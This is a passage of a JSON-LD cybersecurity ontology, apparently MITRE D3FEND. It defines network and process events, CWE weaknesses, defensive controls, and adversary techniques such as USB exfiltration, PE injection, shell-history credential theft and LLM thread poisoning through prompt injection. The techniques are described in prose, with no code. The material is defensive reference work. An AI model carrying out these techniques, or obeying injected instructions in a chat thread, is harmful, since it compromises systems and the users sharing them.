      }
    },
    {
      "@id": "d3f:DHCPAckEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP server sends an ACK message to acknowledge a client's REQUEST, confirming the allocation of an IP address and associated network settings.",
      "rdfs:label": "DHCP Ack Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DHCPEvent"
        },
        {
          "@id": "_:N8ab95490d6ba4c53b0092847b72f7d0b"
        }
      ],
      "skos:altLabel": "DHCPACK"
    },
    {
      "@id": "_:N8ab95490d6ba4c53b0092847b72f7d0b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPRequestEvent"
      }
    },
    {
      "@id": "d3f:KerberosTicketGrantingServiceTicket",
      "@type": "owl:Class",
      "d3f:definition": "A Kerberos ticket-granting service (TGS) ticket is given in response to requesting a Kerberos TGS request.",
      "rdfs:label": "Kerberos Ticket Granting Service Ticket",
      "rdfs:subClassOf": {
        "@id": "d3f:KerberosTicket"
      },
      "skos:altLabel": "TGS Ticket"
    },
    {
      "@id": "d3f:OTSecurityCommand",
      "@type": "owl:Class",
      "d3f:definition": "Ensure confidentiality, integrity, or availability of system information.",
      "rdfs:comment": [
        "BACnet: authenticate\nBACnet: requestKey ",
        "GE-SRTP: PROGRAMMER LOGON"
      ],
      "rdfs:label": "OT Security Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTNetworkManagementCommand"
      }
    },
    {
      "@id": "d3f:ProcessAccessEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where one process interacts with another, such as reading memory, inspecting state, or altering behavior.",
      "rdfs:label": "Process Access Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEvent"
        },
        {
          "@id": "_:Na90fb385f37a40499a9947fd76e69060"
        }
      ]
    },
    {
      "@id": "_:Na90fb385f37a40499a9947fd76e69060",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCreationEvent"
      }
    },
    {
      "@id": "d3f:narrower-transitive",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x narrower-transitive y: The entity x represents a more specific concept than entity y, including indirect or hierarchical relationships where x is a subset of y through intermediate entities.",
      "rdfs:label": "narrower-transitive",
      "rdfs:subPropertyOf": {
        "@id": "d3f:semantic-relation"
      }
    },
    {
      "@id": "d3f:T1052.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1052.001",
      "d3f:definition": "Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.",
      "d3f:modifies": {
        "@id": "d3f:RemovableMediaDevice"
      },
      "rdfs:label": "Exfiltration over USB",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1052"
        },
        {
          "@id": "_:N289a3da5301c40f5b4437368a0b93410"
        }
      ]
    },
    {
      "@id": "_:N289a3da5301c40f5b4437368a0b93410",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemovableMediaDevice"
      }
    },
    {
      "@id": "d3f:Hybrid-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HBTL",
      "d3f:definition": "This method creates an asymmetric mapping from the target to the source and takes into account bias issues of cross-domain correspondences.",
      "d3f:kb-article": "## References\nDay, O., & Khoshgoftaar, T.M. (2017). A survey on heterogeneous transfer learning. Journal of Big Data, 4(1), 29. [Link](https://doi.org/10.1186/s40537-017-0089-0).",
      "rdfs:label": "Hybrid-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HomogenousTransferLearning"
      }
    },
    {
      "@id": "d3f:CWE-1062",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1062",
      "d3f:definition": "The code has a parent class that contains references to a child class, its methods, or its members.",
      "rdfs:label": "Parent Class with References to Child Class",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1061"
      }
    },
    {
      "@id": "d3f:T0870",
      "@type": "owl:Class",
      "d3f:attack-id": "T0870",
      "d3f:definition": "Adversaries may seek to gather information about the current state of a program on a PLC. State information reveals information about the program, including whether it's running, halted, stopped, or has generated an exception. This information may be leveraged as a verification of malicious program execution or to determine if a PLC is ready to download a new program.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Detect Program State - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Detect Program State"
    },
    {
      "@id": "d3f:T1630.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1630.001",
      "d3f:definition": "Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by:",
      "rdfs:label": "Uninstall Malicious Application - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1630"
      },
      "skos:prefLabel": "Uninstall Malicious Application"
    },
    {
      "@id": "d3f:created-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x created-by y: The entity x is brought into existence, developed, or generated by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:creates"
      },
      "rdfs:label": "created-by",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-be-created-by"
        }
      ]
    },
    {
      "@id": "d3f:CWE-535",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-535",
      "d3f:definition": "A command shell error message indicates that there exists an unhandled exception in the web application code. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system.",
      "rdfs:label": "Exposure of Information Through Shell Error Message",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-211"
      }
    },
    {
      "@id": "d3f:HardwareTimerConfigurationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a hardware timer's registers or operational parameters are programmed or modified.",
      "rdfs:label": "Hardware Timer Configuration Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareTimerEvent"
      }
    },
    {
      "@id": "d3f:AML.T0003",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0003",
      "d3f:definition": "Adversaries may search websites owned by the victim for information that can be used during targeting.\nVictim-owned websites may contain technical details about their AI-enabled products or services.\nVictim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info.\nThese sites may also have details highlighting business operations and relationships.\n\nAdversaries may search victim-owned websites to gather actionable information.\nThis information may help adversaries tailor their attacks (e.g. [Adversarial AI Attacks](/techniques/AML.T0017.000) or [Manual Modification](/techniques/AML.T0043.003)).\nInformation from these sources may reveal opportunities for other forms of reconnaissance (e.g. [Search Open Technical Databases](/techniques/AML.T0000) or [Search Open AI Vulnerability Analysis](/techniques/AML.T0001))",
      "rdfs:label": "Search Victim-Owned Websites - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Search Victim-Owned Websites"
    },
    {
      "@id": "d3f:CWE-32",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-32",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '...' (triple dot) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '...' (Triple Dot)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:Partition",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A partition is a region on secondary storage device created so that the region can be managed by itself; separate from any other regions (partitions) on that secondary storage device. Creating partitions is typically the first step of preparing a newly installed storage device, before any file system is created. The device stores the information about the partitions' locations and sizes in an area known as the partition table that the operating system reads before any other part of the disk. Each partition then appears to the operating system as a distinct \"logical\" storage device that uses part of the actual device. System administrators use a program called a partition editor to create, resize, delete, and manipulate the partitions. Partitioning allows the use of different filesystems to be installed for different kinds of files. Separating user data from system data can prevent the system partition from becoming full and rendering the system unusable. Partitioning can also make backing up easier. [Definition adapted as generalization from definition of disk partitioning and distinct from in-memory partitions.]",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Disk_partitioning"
      },
      "rdfs:label": "Partition",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Partition_table"
        },
        {
          "@id": "dbr:Memory_management_(operating_systems)"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": [
        "Disk Partition",
        "Disk Slice"
      ]
    },
    {
      "@id": "d3f:Reference-SuspiciousArguments_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-07-001/"
      },
      "d3f:kb-abstract": "Malicious actors may rename built-in commands or external tools, such as those provided by SysInternals, to better blend in with the environment. In those cases, the file path name is arbitrary and may blend in well with the background. If the arguments are closely inspected, it may be possible to infer what tools are running and understand what an adversary is doing. When any legitimate software shares the same command lines, it must be whitelisted according to the expected parameters.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-07-001: Suspicious Arguments",
      "rdfs:label": "Reference - CAR-2013-07-001: Suspicious Arguments - MITRE"
    },
    {
      "@id": "d3f:T1055.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.002",
      "d3f:definition": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:may-add": {
        "@id": "d3f:ObjectFile"
      },
      "rdfs:label": "Portable Executable Injection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:N1d13c70ac06444f49ec61274471b6cb8"
        }
      ]
    },
    {
      "@id": "_:N1d13c70ac06444f49ec61274471b6cb8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-add"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ObjectFile"
      }
    },
    {
      "@id": "d3f:MultimediaFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:DigitalMultimedia"
      },
      "d3f:definition": "A file that contains digital multimedia.",
      "rdfs:label": "Multimedia File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:N55d53a4624434dcaa1ace9781df8aa07"
        }
      ]
    },
    {
      "@id": "_:N55d53a4624434dcaa1ace9781df8aa07",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalMultimedia"
      }
    },
    {
      "@id": "d3f:CWE-645",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-645",
      "d3f:definition": "The product contains an account lockout protection mechanism, but the mechanism is too restrictive and can be triggered too easily, which allows attackers to deny service to legitimate users by causing their accounts to be locked out.",
      "rdfs:label": "Overly Restrictive Account Lockout Mechanism",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-287"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForControllingCommunicationPorts",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8566924"
      },
      "d3f:kb-abstract": "A method for limiting devices and controlling the applications executed from USB ports on personal computers (PCs).",
      "d3f:kb-author": "Steven V Bacastow",
      "d3f:kb-organization": "OL Security LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:IOPortRestriction"
      },
      "d3f:kb-reference-title": "Method and system for controlling communication ports",
      "rdfs:label": "Reference - Method and system for controlling communication ports"
    },
    {
      "@id": "d3f:T1598.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1598.003",
      "d3f:definition": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.",
      "rdfs:label": "Spearphishing Link",
      "rdfs:subClassOf": {
        "@id": "d3f:T1598"
      }
    },
    {
      "@id": "d3f:CCI-001684_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system notifies organization-defined personnel or roles for account modification actions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2011-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001684"
    },
    {
      "@id": "d3f:DE-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0004",
      "d3f:definition": "The adversary presents themselves as an authorized origin so activity appears legitimate across RF, protocol, and organizational boundaries. Techniques include crafting telecommand frames with correct headers, counters, and dictionaries; imitating station “fingerprints” such as Doppler, polarization, timing, and framing; replaying or emulating crosslink identities; and using insider-derived credentials or roles to operate mission tooling. Masquerading can also target metadata, virtual channel IDs, APIDs, source sequence counts, and facility identifiers, so logs and telemetry attribute actions to expected entities. The effect is that commands, file transfers, or configuration changes are processed as if they came from approved sources, reducing scrutiny and delaying detection.",
      "rdfs:label": "Masquerading - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTADefenseEvasionTechnique"
      },
      "skos:prefLabel": "Masquerading"
    },
    {
      "@id": "d3f:T1218.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.004",
      "d3f:definition": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\\Windows\\Microsoft.NET\\Framework\\v<version>\\InstallUtil.exe</code> and <code>C:\\Windows\\Microsoft.NET\\Framework64\\v<version>\\InstallUtil.exe</code>.",
      "rdfs:label": "InstallUtil",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:CWE-102",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-102",
      "d3f:definition": "The product uses multiple validation forms with the same name, which might cause the Struts Validator to validate a form that the programmer does not expect.",
      "rdfs:label": "Struts: Duplicate Validation Forms",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1173"
        },
        {
          "@id": "d3f:CWE-694"
        }
      ]
    },
    {
      "@id": "d3f:CCI-001936_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements multifactor authentication for network access to privileged accounts such that one of the factors is provided by a device separate from the system gaining access.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001936"
    },
    {
      "@id": "d3f:CWE-468",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-468",
      "d3f:definition": "In C and C++, one may often accidentally refer to the wrong memory due to the semantics of when math operations are implicitly scaled.",
      "rdfs:label": "Incorrect Pointer Scaling",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:T1552.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:CommandHistoryLogFile"
      },
      "d3f:attack-id": "T1552.003",
      "d3f:definition": "Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)",
      "rdfs:label": "Shell History",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1552"
        },
        {
          "@id": "_:N23723f0e48b84db8b836abf98a9941e9"
        }
      ]
    },
    {
      "@id": "_:N23723f0e48b84db8b836abf98a9941e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CommandHistoryLogFile"
      }
    },
    {
      "@id": "d3f:DefaultUserAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.",
      "rdfs:label": "Default User Account",
      "rdfs:seeAlso": {
        "@id": "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CCI-000057_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system initiates a session lock after the organization-defined time period of inactivity.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-19T00:00:00"
      },
      "rdfs:label": "CCI-000057"
    },
    {
      "@id": "d3f:AML.T0091",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0091",
      "d3f:definition": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.\n\nAI services commonly use alternate authentication material as a primary means for users to make queries, making them vulnerable to this technique.",
      "rdfs:label": "Use Alternate Authentication Material - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0091"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASLateralMovementTechnique"
      },
      "skos:prefLabel": "Use Alternate Authentication Material"
    },
    {
      "@id": "dcterms:title",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:T1471",
      "@type": "owl:Class",
      "d3f:attack-id": "T1471",
      "d3f:definition": "An adversary may encrypt files stored on a mobile device to prevent the user from accessing them. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.",
      "rdfs:label": "Data Encrypted for Impact - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Data Encrypted for Impact"
    },
    {
      "@id": "d3f:BootLoader",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A bootloader is software that is responsible for booting a computer. When a computer is turned off, its software—including operating systems, application code, and data—remains stored on non-volatile memory. When the computer is powered on, it typically does not have an operating system or its loader in random-access memory (RAM). The computer first executes a relatively small program stored in read-only memory (ROM, and later EEPROM, NOR flash) along with some needed data, to initialize RAM (especially on x86 systems) to access the nonvolatile device (usually block device, e.g., NAND flash) or devices from which the operating system programs and data can be loaded into RAM.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Bootloader"
      },
      "rdfs:label": "Boot Loader",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      },
      "skos:altLabel": "Bootloader"
    },
    {
      "@id": "d3f:RTCUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a Real-Time Clock's stored time value is read from or written to its battery-backed storage.",
      "rdfs:label": "RTC Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareClockEvent"
        },
        {
          "@id": "_:Ne5fe3a089fbb4e259e85d33c7de3a95c"
        }
      ]
    },
    {
      "@id": "_:Ne5fe3a089fbb4e259e85d33c7de3a95c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RealtimeClock"
      }
    },
    {
      "@id": "d3f:PrintServer",
      "@type": "owl:Class",
      "d3f:definition": "A print server, or printer server, is a device that connects printers to client computers over a network. It accepts print jobs from the computers and sends the jobs to the appropriate printers, queuing the jobs locally to accommodate the fact that work may arrive more quickly than the printer can actually handle.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Print_server"
      },
      "rdfs:label": "Print Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:EventLogExportEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the export of event log data to a file or external system for backup or analysis purposes.",
      "rdfs:label": "Event Log Export Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:CCI-001403_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically audits account modification actions.",
      "d3f:exactly": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-24T00:00:00"
      },
      "rdfs:label": "CCI-001403"
    },
    {
      "@id": "d3f:AML.T0080.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0080.001",
      "d3f:definition": "Adversaries may introduce malicious instructions into a chat thread of a large language model (LLM) to cause behavior changes which persist for the remainder of the thread. A chat thread may continue for an extended period over multiple sessions.\n\nThe malicious instructions may be introduced via Direct or Indirect Prompt Injection. Direct Injection may occur in cases where the adversary has acquired a user's LLM API keys and can inject queries directly into any thread.\n\nAs the token limits for LLMs rise, AI systems can make use of larger context windows which allow malicious instructions to persist longer in a thread.\nThread Poisoning may affect multiple users if the LLM is being used in a service with shared threads. For example, if an agent is active in a Slack channel with multiple participants, a single malicious message from one user can influence the agent's behavior in future interactions with others.",
      "rdfs:label": "Thread - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0080.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0080"
      },
      "skos:prefLabel": "Thread"
    },
    {
      "@id": "d3f:CWE-400",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-400",
      "d3f:definition": "The product does not properly control the allocation and maintenance of a limited resource.",
      "d3f:synonym": "Resource Exhaustion",
      "rdfs:label": "Uncontrolled Resource Consumption",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-10_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Configuration Management | Hardware Integrity Verification",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:FirmwareVerification"
      },
      "rdfs:label": "SA-10(3)"
    },
    {
      "@id": "d3f:Identifier",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An identifier is a name that identifies (that is, labels the identity of) either a unique object or a unique class of objects, where the \"object\" or class may be an idea, physical [countable] object (or class thereof), or physical [noncountable] substance (or class thereof). The abbreviation ID often refers to identity, identification (the process of identifying), or an identifier (that is, an instance of identification). An identifier may be a word, number, letter, symbol, or any combination of those.",
      "d3f:identifies": {
        "@id": "d3f:Artifact"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Identifier"
      },
      "rdfs:label": "Identifier",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:Nf6ac6158aaa44061a8412140e25e7fe6"
        }
      ],
      "skos:altLabel": "ID"
    },
    {
      "@id": "_:Nf6ac6158aaa44061a8412140e25e7fe6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Artifact"
      }
    },
    {
      "@id": "d3f:process-data-property",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x process-data-property y: The process x has the data property y.",
      "rdfs:label": "process-data-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-artifact-data-property"
      }
    },
    {
      "@id": "d3f:CWE-649",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-649",
      "d3f:definition": "The product uses obfuscation or encryption of inputs that should not be mutable by an external actor, but the product does not use integrity checks to detect if those inputs have been modified.",
      "rdfs:label": "Reliance on Obfuscation or Encryption of Security-Relevant Inputs without Integrity Checking",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:ConfigurationModificationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event that changes the persisted state of configuration resources by adding, updating, or removing parameters, impacting the target component's behavior.",
      "rdfs:label": "Configuration Modification Event",
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationEvent"
      }
    },
    {
      "@id": "d3f:T1069.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1069.001",
      "d3f:definition": "Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.",
      "rdfs:label": "Local Groups",
      "rdfs:subClassOf": {
        "@id": "d3f:T1069"
      }
    },
    {
      "@id": "d3f:AML.T0013",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0013",
      "d3f:definition": "Adversaries may discover the ontology of an AI model's output space, for example, the types of objects a model can detect.\nThe adversary may discover the ontology by repeated queries to the model, forcing it to enumerate its output space.\nOr the ontology may be discovered in a configuration file or in documentation about the model.\n\nThe model ontology helps the adversary understand how the model is being used by the victim.\nIt is useful to the adversary in creating targeted attacks.",
      "rdfs:label": "Discover AI Model Ontology - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0013"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover AI Model Ontology"
    },
    {
      "@id": "d3f:CCI-002302_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements organization-defined techniques or technologies with an organization-defined level of assurance in associating security attributes to information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002302"
    },
    {
      "@id": "d3f:UserGeolocationLogonPatternAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UserGeolocationLogonPatternAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-UGLPA",
      "d3f:definition": "Monitoring geolocation data of user logon attempts and comparing it to a baseline user behavior profile to identify anomalies in logon location.",
      "d3f:kb-article": "## How it works\nGeolocation data for each user logon attempt is collected and used to create a baseline user behavior profile. Current geolocation logon data is then compared against the user behavior profile. Logon activity that deviates from normal patterns can help in identifying situations that may be indicative of a remote attacker using stolen credentials. For example:\n\n* logons from locations that are different from where a user usually logs in\n* logons from a location in which an enterprise has no users located\n* logon that is not physically possible given the elapsed time since a logon from another location.\n\n## Considerations\n* Potential for false positives from logon anomalies that are not associated with malicious activity.\n* Attackers may not differentiate their logon behavior enough to trigger an alert.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForNetworkFraudDetectionAndRemediationThroughAnalytics_IdaptiveLLC"
        },
        {
          "@id": "d3f:Reference-System,Method,AndComputerProgramProductForDetectingAndAssessingSecurityRisksInANetwork_ExabeamInc"
        }
      ],
      "rdfs:label": "User Geolocation Logon Pattern Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N4a2e923c265442e0bb297fd979b2dbd9"
        }
      ]
    },
    {
      "@id": "_:N4a2e923c265442e0bb297fd979b2dbd9",
